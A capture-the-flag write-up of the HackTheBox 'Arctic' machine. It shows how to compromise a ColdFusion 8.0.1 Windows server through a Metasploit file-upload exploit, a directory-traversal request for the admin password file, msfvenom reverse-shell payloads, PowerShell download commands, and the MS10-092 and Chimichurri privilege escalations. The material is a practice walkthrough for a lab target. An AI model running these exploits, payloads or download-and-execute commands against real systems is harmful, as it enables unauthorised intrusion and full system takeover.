9 minute read

Machine Information


Arctic is rated easy and is a fairly straightforward box. Basic troubleshooting is required to get the correct exploit functioning properly. Skills required are basic knowledge of Windows, enumerating ports and services. Skills learned are exploit modification, troubleshooting Metasploit modules and HTTP requests.

Hosting Site HackTheBox
Link To Machine HTB - 009 - Easy - Arctic
Machine Release Date 22nd March 2017
Date I Completed It 14th July 2019
Distribution used Kali 2019.1 – Release Info

Initial Recon

Check for open ports with Nmap:

root@kali:~/htb/machines/arctic# nmap -sC -sV -oA arctic
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-29 22:14 BST
Nmap scan report for
Host is up (0.037s latency).
Not shown: 997 filtered ports
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.50 seconds

Nmap doesn’t know what port 8500 is, so have a look at that first:


Has a 30 second wait every time you click on a page/link on this port.

Looking around I find this:


We now know we are dealing with a ColdFusion based site, let’s check searchsploit:

root@kali:~/htb/machines/arctic# searchsploit coldfusion 8.0.1
---------------------------------------------------------- ----------------------------------------
 Exploit Title                                            |  Path
                                                          | (/usr/share/exploitdb/)
---------------------------------------------------------- ----------------------------------------
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authent | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_loginto | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/ | exploits/cfm/webapps/33168.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Met | exploits/cfm/webapps/16788.rb

The bottom one looks good, with file upload and metasploit module it should be easy.

Gaining Access

Start msf and search:

root@kali:~/htb/machines/arctic# msfconsole
msf5> search coldfusion

Matching Modules

   #  Name                                                           Disclosure Date  Rank       Check  Description
   -  ----                                                           ---------------  ----       -----  -----------
   7  exploit/windows/http/coldfusion_fckeditor                      2009-07-03       excellent  No     ColdFusion 8.0.1 Arbitrary File Upload and Execute

Let’s use the fckeditor module and set options:

msf5 > use exploit/windows/http/coldfusion_fckeditor
msf5 exploit(windows/http/coldfusion_fckeditor) > options

Module options (exploit/windows/http/coldfusion_fckeditor):
   Name           Current Setting                                                             Required  Description
   ----           ---------------                                                             --------  -----------
   FCKEDITOR_DIR  /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm  no        The path to upload.cfm
   Proxies                                                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                     yes       The target address range or CIDR identifier
   RPORT          80                                                                          yes       The target port (TCP)
   SSL            false                                                                       no        Negotiate SSL/TLS for outgoing connections
   VHOST                                                                                      no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Universal Windows Target

msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOST
msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500
RPORT => 8500

With target set let’s run the exploit:

msf5 exploit(windows/http/coldfusion_fckeditor) > run

[*] Started reverse TCP handler on
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.

Fails almost instantly, seems the delay on the webserver is stopping msf from executing. Go to Burp, set up a new listener, bind to port 8500:


Redirect any requests that come to it on to the box:


Choose Ok to get out and make sure it’s enabled:


Back to msf and set RHOST to now, so it goes via Burp:

msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOST
msf5 exploit(windows/http/coldfusion_fckeditor) > exploit
[*] Started reverse TCP handler on
[*] Sending our POST request...

Now go back to Burp, will see it intercepted:


Can see the exploit is using a null byte (%00) at the end to execute code.

Send to Repeater and have a look:


Using the null byte allowed the upload of the EU.jsp file as well as the WVSKVYWB.txt file.

Initial Shell

On a new terminal start a nc listener:

root@kali:~/htb/machines/arctic# nc -lvnp 4444
listening on [any] 4444 ...

Now go back to web page and load the .jsp file:


Page will hang for 30 seconds as before, but then will open a reverse shell to my nc listener:

connect to [] from (UNKNOWN) [] 49342
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

User Flag

Let’s see who we have connected as:


We are user tolis, let’s grag the flag:

C:\ColdFusion8\runtime\bin>more c:\users\tolis\Desktop\user.txt
more c:\users\tolis\Desktop\user.txt

Privilege Escalation

We are currently connected via a meterpreter shell as the user tolis. The next step is to upload a fully fledged reverse shell so we can get privilege escalation. Create a payload with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=444 -f exe > met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

Now start an http server in this folder so we can get to the file:

root@kali:~/htb/machines/arctic# python -m SimpleHTTPServer

Go back to your msfconsole and get a handler waiting for a new reverse connection:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  ----------
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > set windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf5 exploit(multi/handler) > set LHOST
msf5 exploit(multi/handler) > set LPORT 444
LPORT => 444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on

Go back to our existing user shell on the box, and grab our new payload we created in msfvenom:

C:\ColdFusion8\runtime\bin>powershell.exe "(New-Object System.Net.WebClient).downloadFile('','met.exe')"

File will be downloaded to current directory, now just run to open reverse shell back to msfconsole:


Switch back to msfconsole, should see the shell connecting:

[*] Sending stage (179779 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-07-30 22:34:16 +0100

Now we have a proper reverse TCP shell to box, let’s have a look:

meterpreter > sysinfo
Computer        : ARCTIC
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x64/windows

meterpreter > getuid
Server username: ARCTIC\tolis

Put current session to background so we can run priv esc exploit:

meterpreter > background
[*] Backgrounding session 1...

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set SESSION 1
msf5 exploit(windows/local/ms10_092_schelevator) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST
msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 1234
LPORT => 1234
msf5 exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\SBrfJlgmrqFzj.exe
[*] Creating task: OmogtONV5
[*] SUCCESS: The scheduled task "OmogtONV5" has successfully been created.
[*] Reading the task file contents from C:\Windows\system32\tasks\OmogtONV5...
[*] Original CRC32: 0xadd0c21d
[*] Final CRC32: 0xadd0c21d
[*] Writing our modified content back...
[*] Validating task: OmogtONV5
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] OmogtONV5                                1/9/2019 8:35:00       Ready
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "OmogtONV5" have been changed.
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "OmogtONV5" have been changed.
[*] Executing the task...
[*] Sending stage (179779 bytes) to
[*] SUCCESS: Attempted to run the scheduled task "OmogtONV5".
[*] Deleting the task...
[*] Meterpreter session 2 opened ( -> at 2019-07-30 22:39:54 +0100
[*] SUCCESS: The scheduled task "OmogtONV5" was successfully deleted.

Root Flag

Should now have a shell as root:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We can now navigate to root.txt:

meterpreter > cd C:\users\administrator\Desktop
meterpreter > dir
Listing: C:\users\administrator\Desktop
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-22 17:47:48 +0000  desktop.ini
100444/r--r--r--  32    fil   2017-03-22 19:01:59 +0000  root.txt
meterpreter > cat root.txt

Alternative Method (without Meterpreter)

We already know the box is using Coldfusion, so we can look for another way in:

root@kali:~/htb/machines/arctic# searchsploit coldfusion traversal
------------------------------------------------------- ----------------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - Directory Traversal                 | exploits/multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)    | exploits/multiple/remote/16985.rb
------------------------------------------------------- ----------------------------------------

Let’s have a look at the Python script:

searchsploit -x exploits/multiple/remote/14641.py

# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

We can try this on the box with this:

This gives us:


The password looks hashed, let’s use hash-identifier to find out how:

root@kali:~/htb/machines/arctic# hash-identifier
HASH: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
Possible Hashs:
[+]  SHA-1
[+]  MySQL5 - SHA-1(SHA-1($pass))

We can try cracking it here, which gives me:


We can create a java payload using msfvenom:

root@kali:~/htb/machines/arctic# msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f raw > shell.jsp
Payload size: 1497 bytes

Now start an http server in this folder so we can get to the file:

python -m SimpleHTTPServer 80

Go back to login page, use admin and happyday to get in. Then go to Debugging & Logging then Scheduled Tasks:


Create a new task:


Once created need to click the left green button to run:


Start a nc listener on port 4444 to catch the reverse shell:

root@kali:~/htb/machines/arctic# nc -lvnp 4444
listening on [any] 4444 ...

Now go to website on box and open the shell we’ve uploaded:


Back to terminal and we should get a connection to our shell, and we see we are on as user tolis:

connect to [] from (UNKNOWN) [] 60740
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

We can now get the user flag as above. Now we need to escalate to root, let’s use Chimichurri:

root@kali:~/htb/machines/arctic# git clone https://github.com/Re4son/Chimichurri.git
Cloning into 'Chimichurri'...
remote: Enumerating objects: 66, done.
remote: Counting objects: 100% (66/66), done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 66 (delta 23), reused 66 (delta 23), pack-reused 0
Unpacking objects: 100% (66/66), done.
root@kali:~/htb/machines/arctic/Chimichurri# cp Chimichurri.exe ..

Switch back to the box, and download the file to it:

C:\Users\tolis>powershell.exe "(New-Object System.Net.WebClient).downloadFile('','chimichurri.exe')"
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5
 Directory of C:\Users\tolis
02/08/2019  08:49    <DIR>          .
02/08/2019  08:49    <DIR>          ..
02/08/2019  08:52            97.280 chimichurri.exe
22/03/2017  10:00    <DIR>          Contacts
22/03/2017  10:00    <DIR>          Desktop
22/03/2017  10:00    <DIR>          Documents
22/03/2017  10:00    <DIR>          Downloads
22/03/2017  10:00    <DIR>          Favorites
22/03/2017  10:00    <DIR>          Links
22/03/2017  10:00    <DIR>          Music
22/03/2017  10:00    <DIR>          Pictures
22/03/2017  10:00    <DIR>          Saved Games
22/03/2017  10:00    <DIR>          Searches
22/03/2017  10:00    <DIR>          Videos
               1 File(s)         97.280 bytes
              13 Dir(s)  32.815.558.656 bytes free

Now we can start a new terminal and set a nc listener to catch the exploit:

root@kali:~/htb/machines/arctic# nc -lvnp 4445
listening on [any] 4445 ...

On the box we run the exploit and point at listener:

C:\Users\tolis>chimichurri.exe 4445
chimichurri.exe 4445
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

Switch to nc on other terminal, should now be root:

connect to [] from (UNKNOWN) [] 60826
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
nt authority\system

We can now get the root flag as above.

All done. See you next time.